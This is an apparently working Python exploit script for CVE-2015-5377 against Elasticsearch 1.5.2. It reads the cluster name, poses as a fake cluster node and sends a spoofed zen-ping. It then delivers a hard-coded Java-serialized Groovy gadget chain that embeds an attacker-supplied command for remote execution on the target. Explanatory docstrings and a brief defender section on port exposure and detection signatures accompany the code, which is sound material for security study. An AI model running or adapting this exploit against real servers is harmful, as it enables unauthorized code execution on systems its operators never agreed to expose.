"""Proof-of-concept script for CVE-2015-5377 against Elasticsearch 1.5.2 (as hard-coded in the banner).

What the code below does, in order (see main()):

1. get_cluster_name(): unauthenticated HTTP GET to ``http://<SERVER_IP>:9200/_cluster/state``
   to read the cluster name.
2. server(): a TCP listener on 0.0.0.0:TCP_PORT (9300) that poses as a cluster node;
   every accepted connection is handed to client() on its own thread.
3. zenping(): one UDP datagram to ``<SERVER_IP>:UDP_PORT`` (54328) carrying the cluster
   name and YOUR_IP, so the target node treats YOUR_IP as a peer and connects to the
   listener above.
4. client(): on the first bytes received from the target, assembles a transport frame
   (``b'ES'`` + length + request id + status + version + DATA1/DATA2/DATA3) whose body is
   a Java-serialized object graph containing COMMAND, and sends it over a *new* TCP
   connection to ``<SERVER_IP>:9300``.

Defender notes (grounded in the bytes and ports used here):

* Exposure requires the HTTP (9200), transport (9300) and zen-ping (54328) ports of the
  node to be reachable from an untrusted host. Restricting those ports to cluster
  members and upgrading to a release the vendor advisory marks as fixed removes the
  precondition this script depends on.
* Detection: a unicast zen ping from a host that is not a cluster member, a new
  transport connection from the node to that host, and an inbound 9300 frame whose
  body contains Java class names such as
  ``sun.reflect.annotation.AnnotationInvocationHandler``, ``java.lang.reflect.Proxy``,
  ``org.codehaus.groovy.runtime.ConvertedClosure`` / ``MethodClosure`` (all readable in
  DATA1 below) followed by an attacker-chosen string (DATA2).
"""
import socket
import struct
import requests
import time
import sys
import os
from signal import signal, SIGINT
from _thread import *  # provides start_new_thread() and interrupt_main() used below

# Filled in by read_arg() from argv. They are module globals because client()
# and zenping() run on other threads and read them directly.
IP = ''        # target Elasticsearch host (argv[1])
YOUR_IP = ''   # address advertised in the zen ping; the target connects back here (argv[2])
COMMAND = ''   # string embedded into the serialized object graph as DATA2 (argv[3])
TCP_PORT = 9300    # used for BOTH the local fake-node listener and the target's transport port
UDP_PORT = 54328   # zen-ping port on the target

def banner() -> None:
    """Print the hard-coded tool banner (CVE id, targeted version, author)."""
    print("")
    print("+-----------------------------------------+")
    print("+ CVE-2015-5377 +")
    print("+ ELASTICSEARCH 1.5.2 +")
    print("+ fi3ro +")
    print("+-----------------------------------------+")
    print("")

def print_usage() -> None:
    """Print the argv layout and terminate the process (exit() never returns)."""
    print("")
    print("+---------------------------------------------------+")
    print("+ USAGE: CVE-2015-5377.py SERVER_IP YOUR_IP COMMAND +")
    print("+---------------------------------------------------+")
    print("")
    exit()

def read_arg() -> None:
    """Copy argv[1..3] into the IP / YOUR_IP / COMMAND globals.

    No validation is done here: main() only checks that at least three
    arguments exist, so malformed addresses surface later (zenping() raises
    on a non dotted-quad YOUR_IP; requests raises on a bad SERVER_IP).
    """
    global IP
    IP = sys.argv[1]
    global YOUR_IP
    YOUR_IP = sys.argv[2]
    global COMMAND
    COMMAND = sys.argv[3]

def handler(signal_received, frame) -> None:
    """SIGINT handler: terminate the process.

    Besides a real Ctrl-C, this is how the program normally ends:
    client() calls interrupt_main(), which simulates SIGINT in the main
    thread, which is otherwise stuck in the ``while 1: pass`` loop in main().
    """
    exit()

def get_cluster_name() -> str:
    """Return ``cluster_name`` from the target's ``_cluster/state`` HTTP endpoint.

    Plain HTTP, no authentication, no timeout (requests.get without ``timeout``
    blocks indefinitely if the host accepts the connection but never answers).
    Raises requests exceptions on connection errors and KeyError if the JSON
    has no ``cluster_name``.
    """
    r = requests.get('http://'+ IP + ':9200/_cluster/state?pretty')
    return r.json()['cluster_name']

def client(connection: socket.socket) -> None:
    """Handle one inbound connection on the fake-node listener.

    Reads a single buffer from the peer, copies its bytes 6..14 as the request
    id, builds the transport frame and sends it over a NEW TCP connection to
    IP:TCP_PORT (not back over ``connection``). Afterwards it signals the main
    thread to exit. Runs on a thread started by server().

    Args:
        connection: the socket returned by ``sock.accept()`` in server().
    """
    while True:
        data = connection.recv(4096)
        b = bytearray(data)
        if not data:
            break  # peer closed without sending anything
        TOKEN = b'\x45\x53'  # b'ES': the transport frame prefix (mirrors what is sent below)
        MESSAGE_LENGHT = b'\x00\x00\x07\xf2'  # placeholder only; recomputed below from the real body length
        # Offset 6..14 is where the frame built below places its own request id
        # (2-byte token + 4-byte length + 8-byte id), so this echoes the peer's id.
        # NOTE(review): there is no check that 4096-byte read actually contained 14 bytes.
        REQUEST_ID = b[6:14]
        STATUS_FLAG = b'\x03'
        VERSION = b'\x00\x0f\xb8\x9b'  # 0x000fb89b; presumably a transport/version id field — not derived here
        # Serialized Java object graph, part 1: class descriptors for
        # AnnotationInvocationHandler, java.lang.reflect.Proxy, Groovy
        # ConvertedClosure / ConversionHandler / MethodClosure / Closure (names are
        # readable as ASCII in the bytes). Ends right before the length-prefixed
        # string that DATA2 supplies.
        DATA1 = b'\x05\x73\x72\x00\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x00\x2c\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x74\x65\x64\x43\x6c\x6f\x73\x75\x72\x65\x10\x23\x37\x19\xf7\x15\xdd\x1b\x02\x00\x01\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x00\x2d\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x43\x6f\x6e\x76\x65\x72\x73\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x10\x23\x37\x1a\xd6\x01\xbc\x1b\x02\x00\x02\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x68\x61\x6e\x64\x6c\x65\x43\x61\x63\x68\x65\x74\x00\x28\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x3b\x78\x70\x73\x72\x00\x00\x29\x6f\x72\x67\x2e\x63\x6f\x64\x65\x68\x61\x75\x73\x2e\x67\x72\x6f\x6f\x76\x79\x2e\x72\x75\x6e\x74\x69\x6d\x65\x2e\x4d\x65\x74\x68\x6f\x64\x43\x6c\x6f\x73\x75\x72\x65\x8f\x10\x31\xac\xf5\x9c\xf2\xcc\x02\x00\x01\x4c\x00\x06\x6d\x65\x74\x68\x6f\x64\x71\x00\x7e\x00\x09\x78\x72\x00\x00\x13\x67\x72\x6f\x6f\x76\x79\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x6f\x73\x75\x72\x65\x3c\xa0\xc7\x66\x16\x12\x6c\x5a\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\x6d\x61\x78\x69\x6d\x75\x6d\x4e\x75\x6d\x62\x65\x72\x4f\x66\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x73\x49\x00\x0f\x72\x65\x73\x6f\x6c\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4c\x00\x03\x62\x63\x77\x74\x00\x3c\x4c\x6f\x72\x67\x2f\x63\x6f\x64\x65\x68\x61\x75\x73\x2f\x67\x72\x6f\x6f\x76\x79\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x63\x61\x6c\x6c\x73\x69\x74\x65\x2f\x42\x6f\x6f\x6c\x65\x61\x6e\x43\x6c\x6f\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3b\x4c\x00\x08\x64\x65\x6c\x65\x67\x61\x74\x65\x71\x00\x7e\x00\x0b\x4c\x00\x05\x6f\x77\x6e\x65\x72\x71\x00\x7e\x00\x0b\x5b\x00\x0e\x70\x61\x72\x61\x6d\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x0a\x74\x68\x69\x73\x4f\x62\x6a\x65\x63\x74\x71\x00\x7e\x00\x0b\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74'
        print("[+] Command is: " + COMMAND)
        c = COMMAND.encode('ascii')  # UnicodeEncodeError on non-ASCII input
        # Big-endian 2-byte length prefix + the command bytes ('>h' is signed:
        # struct.error for commands longer than 32767 bytes).
        DATA2 = struct.pack('>h', len(c)) + c
        # Serialized Java object graph, part 2: remaining class descriptors
        # (java.lang.Class[]/String[] arrays, java.io.File, the string "execute",
        # a ConcurrentHashMap with 16 segments backed by ReentrantLock$NonfairSync,
        # the "entrySet" string and java.lang.Override). The 15 repeated
        # ``sq ~ \x20 sq ~ \x24 ...`` runs are back-references to the first
        # segment's class descriptors.
        DATA3 = b'\x71\x00\x7e\x00\x13\x75\x72\x00\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x02\x76\x72\x00\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x76\x72\x00\x00\x0c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x46\x69\x6c\x65\x04\x2d\xa4\x45\x0e\x0d\xe4\xff\x03\x00\x01\x4c\x00\x04\x70\x61\x74\x68\x71\x00\x7e\x00\x09\x78\x70\x70\x74\x00\x07\x65\x78\x65\x63\x75\x74\x65\x73\x72\x00\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x78\x72\x00\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x78\x70\x73\x72\x00\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x78\x72\x00\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x78\x72\x00\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x20\x73\x71\x00\x7e\x00\x24\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6e\x74\x72\x79\x53\x65\x74\x76\x72\x00\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70'
        # Real frame length: everything after the 2-byte token and this 4-byte field.
        MESSAGE_LENGHT = struct.pack('>i', len(REQUEST_ID+STATUS_FLAG+VERSION+DATA1+DATA2+DATA3))
        payload = TOKEN + MESSAGE_LENGHT + REQUEST_ID + STATUS_FLAG + VERSION + DATA1 + DATA2 + DATA3
        print("[+] Sending malicious payload with java serialized object...")
        # Delivered over a fresh connection to the target's transport port, not
        # over ``connection``. The socket is never closed explicitly.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((IP, TCP_PORT))
        s.sendall(payload)
        print("[+] Payload sent!")
        print("[!] EXIT")
        interrupt_main()  # simulate SIGINT in the main thread -> handler() -> exit()
        break
    connection.close()
    exit()  # SystemExit in a non-main thread only ends this thread

def server() -> None:
    """Listen on 0.0.0.0:TCP_PORT as the fake node; one client() thread per connection.

    Runs on a thread started by main(). The bind is on all interfaces and the
    peer address is never checked, so any host, not only the target, can
    reach this listener.
    """
    sock = socket.socket()
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    host = '0.0.0.0'
    try:
        sock.bind((host, TCP_PORT))
    except socket.error as e:
        print(str(e))  # bind failure is only printed; execution continues regardless
    print("[!] Spawned.")
    sock.listen(1000)
    while True:
        Client, address = sock.accept()  # `address` is unused: no check that the peer is IP
        start_new_thread(client, (Client, ))
    sock.close()  # unreachable: the accept loop above never exits

def zenping(cluster: str, ip: str) -> None:
    """Send one UDP zen ping to IP:UDP_PORT advertising `ip` as a node of `cluster`.

    Note the asymmetry: `ip` (YOUR_IP) goes *into* the datagram as the address
    the target should connect back to, while the datagram itself is sent to
    the module global IP (the target).

    Args:
        cluster: cluster name as returned by get_cluster_name(); ASCII only.
        ip: dotted-quad IPv4 string; ValueError if a part is non-numeric or >255.
    """
    ZENPING_DATA1 = b'\x01\x09\x08\x04\xbb\x8d\x40\x00\x00\x00\x01'
    c = cluster.encode('ascii')
    # Single-byte length prefix; chr(n).encode('ascii') fails for names longer than 127 bytes.
    length = chr(len(c))
    CLUSTER_DATA = struct.pack('>c', length.encode('ascii')) + c
    # Hard-coded fake-node identity, each field length-prefixed: "es-node-1",
    # a 22-char node id, "ubuntu", "127.0.1.1", then \x00\x01\x00\x04 ahead of
    # the 4-byte address that follows.
    ZENPING_DATA2 = b'\x09\x65\x73\x2d\x6e\x6f\x64\x65\x2d\x31\x16\x4a\x2d\x59\x4e\x39\x72\x73\x55\x53\x62\x57\x2d\x5f\x6e\x4e\x2d\x61\x4d\x35\x55\x55\x67\x06\x75\x62\x75\x6e\x74\x75\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x01\x00\x04'
    IP_DATA = bytes(map(int, ip.split('.')))  # dotted quad -> 4 raw bytes
    # Contains 0x2454 == 9300 (== TCP_PORT); presumably the advertised transport
    # port of the fake node — not verified here.
    ZENPING_DATA3 = b'\x00\x00\x24\x54\x00\xbb\x8d\x40'
    ZENPING = ZENPING_DATA1 + CLUSTER_DATA + ZENPING_DATA2 + IP_DATA + ZENPING_DATA3
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(ZENPING, (IP, UDP_PORT))  # socket is never closed
    print("[!] Sent. ")

def main() -> None:
    """Entry point: argv -> cluster name -> fake-node listener -> zen ping -> wait."""
    if (len(sys.argv)<4):
        print_usage()  # does not return
    banner()
    read_arg()
    signal(SIGINT, handler)
    print("[+] Getting the clustername from the elasticsearch server...")
    cluster = get_cluster_name()
    print("[+] Clustername: " + cluster)
    print("[+] Spawning a fake elasticsearch node...")
    start_new_thread(server, ())
    time.sleep(4)  # fixed delay so the listener is (hopefully) bound before the ping; no readiness signal
    print("[+] Sending zenping to start the exploit... ")
    zenping(cluster, YOUR_IP)
    while 1:
        pass  # busy-wait (burns a core) until client() triggers SIGINT via interrupt_main()

if __name__ == "__main__":
    main()